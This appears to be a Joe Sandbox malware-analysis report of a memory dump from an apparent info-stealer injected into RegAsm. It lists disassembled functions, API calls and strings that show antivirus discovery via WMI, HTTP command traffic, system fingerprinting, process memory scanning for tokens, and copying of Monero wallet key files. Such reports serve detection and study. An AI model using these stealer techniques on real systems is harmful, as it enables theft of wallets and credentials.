Unknown, xrefs: 0040F640
WQL, xrefs: 0040F55F
Unknown, xrefs: 0040F639
ROOT\CIMV2, xrefs: 0040F527

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 3912155974-2016369993
Opcode ID: df7e2f33d7694328f8c103f5683058b6142fea671d3315eb2a9b89803af2b7e5
Instruction ID: 655ce330ca4d4aa924d2826c903e5853b53452371f98fa029f848029e1d660c3
Opcode Fuzzy Hash: df7e2f33d7694328f8c103f5683058b6142fea671d3315eb2a9b89803af2b7e5
Instruction Fuzzy Hash: 91415771A01229BBCB209F91DC49EEF7FBCEF49B10F104426F505B6190D7789A42CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004104B5 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004104BA
strtok_s.MSVCRT ref: 004104EB
StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00410583

Part of subcall function 0040E5F4: lstrlen.KERNEL32(?,00000000,?,00414F6E,004243BA,004243B7,00000000,00000000,?,00415729), ref: 0040E5FD
Part of subcall function 0040E5F4: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E631

lstrcpy.KERNEL32(?,?), ref: 0041063A
lstrcpy.KERNEL32(?,00000000), ref: 00410676
lstrcpy.KERNEL32(?,00000000), ref: 004106BD
lstrcpy.KERNEL32(?,00000000), ref: 00410704
lstrcpy.KERNEL32(?,00000000), ref: 0041074B
strtok_s.MSVCRT ref: 004108AE

Strings

true, xrefs: 0041057B
false, xrefs: 0041059D

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$H_prologlstrlen
String ID: false$true
API String ID: 49562497-2658103896
Opcode ID: 35a901e995ce7fe664252637ef9845fa4609af5ef89428851785c4cab004e7be
Instruction ID: 955e8317cf9e73fa76428418dc7df0127b4732714c2a613baa526150cea9324c
Opcode Fuzzy Hash: 35a901e995ce7fe664252637ef9845fa4609af5ef89428851785c4cab004e7be
Instruction Fuzzy Hash: 5CC1817190020AEFDF24EBA5DC45EDE77B9AF48304F10447AF415B3291EE389A89CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040532C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00405331

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405394
StrCmpCA.SHLWAPI(?), ref: 004053A8
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053CB
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405401
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405425
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405430
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040544E
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004054D4
InternetCloseHandle.WININET(00000000), ref: 004054DF
InternetCloseHandle.WININET(?), ref: 004054E8
InternetCloseHandle.WININET(?), ref: 004054F1

Strings

ERROR, xrefs: 00405542
GET, xrefs: 004053F9
ERROR, xrefs: 0040545B

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 2435781452-2509457195
Opcode ID: 922fd3d66351ff665e0d5f6ddb3770afd655ba989bd980a2f02c20c4a07f87ae
Instruction ID: e47a2a9dff836191dae03e7e5be7413cbf7b6e94c466dc4e05db9cff99f48105
Opcode Fuzzy Hash: 922fd3d66351ff665e0d5f6ddb3770afd655ba989bd980a2f02c20c4a07f87ae
Instruction Fuzzy Hash: BB516D71900119BFEB11DFE5DC85EEEBB7DEB08708F10442AF901B2281DB785A458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004045D8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004045DD

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404624
RtlAllocateHeap.NTDLL(00000000), ref: 0040462B
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040464A
StrCmpCA.SHLWAPI(?), ref: 0040465E
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404682
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004046B8
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004046DC
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004046E7
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404705
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040475D
InternetCloseHandle.WININET(00000000), ref: 0040478F
InternetCloseHandle.WININET(?), ref: 00404798
InternetCloseHandle.WININET(?), ref: 004047A1

Strings

GET, xrefs: 004046B0

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 1687531150-1805413626
Opcode ID: da46ffb43042a774ca468759a5921c5ce18265a9758c19c371aa4c638cea0554
Instruction ID: 840ccbdca42a38d6a765fcc81b709fe69bd95181e767162edbb97da0f5df4511
Opcode Fuzzy Hash: da46ffb43042a774ca468759a5921c5ce18265a9758c19c371aa4c638cea0554
Instruction Fuzzy Hash: B2515AB2900119AFDB10EFE0DC85AEEBBBDEB49714F00052AF611B3190D7784E458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F65D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 116comCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F662
CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000,?,00000000), ref: 0040F672
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410), ref: 0040F683
CoCreateInstance.OLE32(00424CC8,00000000,00000001,00424BF8,?,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000,?,00000000), ref: 0040F69D
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000), ref: 0040F6D3
VariantInit.OLEAUT32(?), ref: 0040F722

Part of subcall function 0040F9A1: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040F748,?,?,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000,?,00000000), ref: 0040F9A9
Part of subcall function 0040F9A1: CharToOemW.USER32(?,00000000), ref: 0040F9B5

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

VariantClear.OLEAUT32(?), ref: 0040F756

Strings

Select * From AntiVirusProduct, xrefs: 0040F6E3
root\SecurityCenter2, xrefs: 0040F6B0
displayName, xrefs: 0040F734
Unknown, xrefs: 0040F75E
Unknown, xrefs: 0040F765
WQL, xrefs: 0040F6E8

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3694693100-2776955613
Opcode ID: ec61c48b394b8bd1b838beaff992832fa5fa27464bd44cc03a9d29044823b587
Instruction ID: e25b098bfabf79a846c1ab49ed7bbde85b5b336b52c70160ae89486b296fc3b1
Opcode Fuzzy Hash: ec61c48b394b8bd1b838beaff992832fa5fa27464bd44cc03a9d29044823b587
Instruction Fuzzy Hash: E0314970A01229BBCB209B92DC49EEF7F78FF89B50F10452AF115B6190C7789601CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 160stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401BB2
memset.MSVCRT ref: 00401BD0

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401BE9,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

lstrcat.KERNEL32(?,00000000), ref: 00401BF4
lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 00401C01
lstrcat.KERNEL32(?,.keys), ref: 00401C1C

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,0042030B,00000000,?,\Monero\wallet.keys,?,0042030A), ref: 00401D07

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00406572: _EH_prolog.MSVCRT ref: 00406577
Part of subcall function 00406572: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040659A
Part of subcall function 00406572: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004065B1
Part of subcall function 00406572: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004065CD
Part of subcall function 00406572: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004065E7
Part of subcall function 00406572: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406608

DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401D7F
memset.MSVCRT ref: 00401D9D

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

Strings

wallet_path, xrefs: 00401BD5
.keys, xrefs: 00401C10
SOFTWARE\monero-project\monero-core, xrefs: 00401BDA
\Monero\wallet.keys, xrefs: 00401C45

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2725398440-218353709
Opcode ID: 6b99023d41fdee722ab12fed0dfe2d8854a89c5ffa363825fe74ddf6028828aa
Instruction ID: 62ecffaa1c87635ee46e0581d1842a33acf380326d03364368e7de767bf6df2e
Opcode Fuzzy Hash: 6b99023d41fdee722ab12fed0dfe2d8854a89c5ffa363825fe74ddf6028828aa
Instruction Fuzzy Hash: 3E513C71C00248EADB05EBE5D846BEDBB78AF18308F54486EF505B21C2EB785619CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDE7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EDEC

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004240DF,00000000,00000000), ref: 0040EE34
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EE7E
wsprintfA.USER32 ref: 0040EEA8
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EEC5
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EEEF
lstrlen.KERNEL32(?), ref: 0040EF04
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424110), ref: 0040EF84

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Strings

- , xrefs: 0040EF8E
?, xrefs: 0040EE2A
%s\%s, xrefs: 0040EEA2

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 404191982-3278919252
Opcode ID: 88fcf90db8ba0c46acaae073f2efc8c1a479e5b9edb38c8ff576a1bff4274926
Instruction ID: b3af7245d51e2a97d718d3e2ca8061efa7b4944ae627a7e9f07a1845d3c489bf
Opcode Fuzzy Hash: 88fcf90db8ba0c46acaae073f2efc8c1a479e5b9edb38c8ff576a1bff4274926
Instruction Fuzzy Hash: D571087180021DEECF15DFE2DD849EEBBBDBB18304F50486AF505B2291EB395A18CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2E6 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E2EB
??_U@YAPAXI@Z.MSVCRT ref: 0040E301
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040E323
memset.MSVCRT ref: 0040E365
??_V@YAXPAX@Z.MSVCRT ref: 0040E49E

Part of subcall function 0040E1A3: strlen.MSVCRT ref: 0040E1BA

Part of subcall function 0040DE52: memcpy.MSVCRT ref: 0040DE72

Strings

N0ZWFt, xrefs: 0040E408, 0040E415
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E37D, 0040E466

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologOpenProcessmemcpymemsetstrlen
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 3050127167-1622206642
Opcode ID: 8fbcb04197499aee056308acc981a7796b2f9812aba5cb04e0c4b3411a2ab5fe
Instruction ID: aa24d39016a57ce3eeba169e9f188326cfac96e702646abf1cd35b76672b4d22
Opcode Fuzzy Hash: 8fbcb04197499aee056308acc981a7796b2f9812aba5cb04e0c4b3411a2ab5fe
Instruction Fuzzy Hash: A5519C71D00218AEDB10EF95DC81AEEBBB8EF04704F20053EF215B62C1DA785E88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F253 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F258
GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F27B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F2AD
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F2F0
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F2F7
wsprintfA.USER32 ref: 0040F323
lstrcat.KERNEL32(00000000,004240B8), ref: 0040F332

Part of subcall function 0040F218: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F229

lstrlen.KERNEL32(00000000), ref: 0040F351

Part of subcall function 0040FE68: malloc.MSVCRT ref: 0040FE76
Part of subcall function 0040FE68: strncpy.MSVCRT ref: 0040FE86

lstrcat.KERNEL32(00000000,00000000), ref: 0040F37E

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Strings

:\, xrefs: 0040F2A3
C, xrefs: 0040F285

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 688099012-3309953409
Opcode ID: 739051c32a13f2f07250d18c1f29f0ae17f5d2e61788a2bd37f4db9c77c62f43
Instruction ID: bfe0def658f07879e8919644e638436bfa11aaebebb13aa95792f6183e1b9a70
Opcode Fuzzy Hash: 739051c32a13f2f07250d18c1f29f0ae17f5d2e61788a2bd37f4db9c77c62f43
Instruction Fuzzy Hash: 1D415071801158AACB11EBE6DD899EFBB7DEF59304F10047EF905B3181D6384A19CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00411B01 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411B06

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040532C: _EH_prolog.MSVCRT ref: 00405331
Part of subcall function 0040532C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405394
Part of subcall function 0040532C: StrCmpCA.SHLWAPI(?), ref: 004053A8
Part of subcall function 0040532C: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053CB
Part of subcall function 0040532C: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405401
Part of subcall function 0040532C: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405425
Part of subcall function 0040532C: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405430
Part of subcall function 0040532C: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040544E

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411B85
lstrlen.KERNEL32(00000000), ref: 00411B9C

Part of subcall function 0040FA81: LocalAlloc.KERNEL32(00000040,00411BB2,00000001,00000000,?,00411BB1,00000000,00000000), ref: 0040FA9A

StrStrA.SHLWAPI(00000000,00000000), ref: 00411BC3
lstrlen.KERNEL32(00000000), ref: 00411BD8
lstrlen.KERNEL32(00000000), ref: 00411BF0

Strings

ERROR, xrefs: 00411C00
ERROR, xrefs: 00411C22
ERROR, xrefs: 00411B77
ERROR, xrefs: 00411C1B
ERROR, xrefs: 00411C14

Memory Dump Source

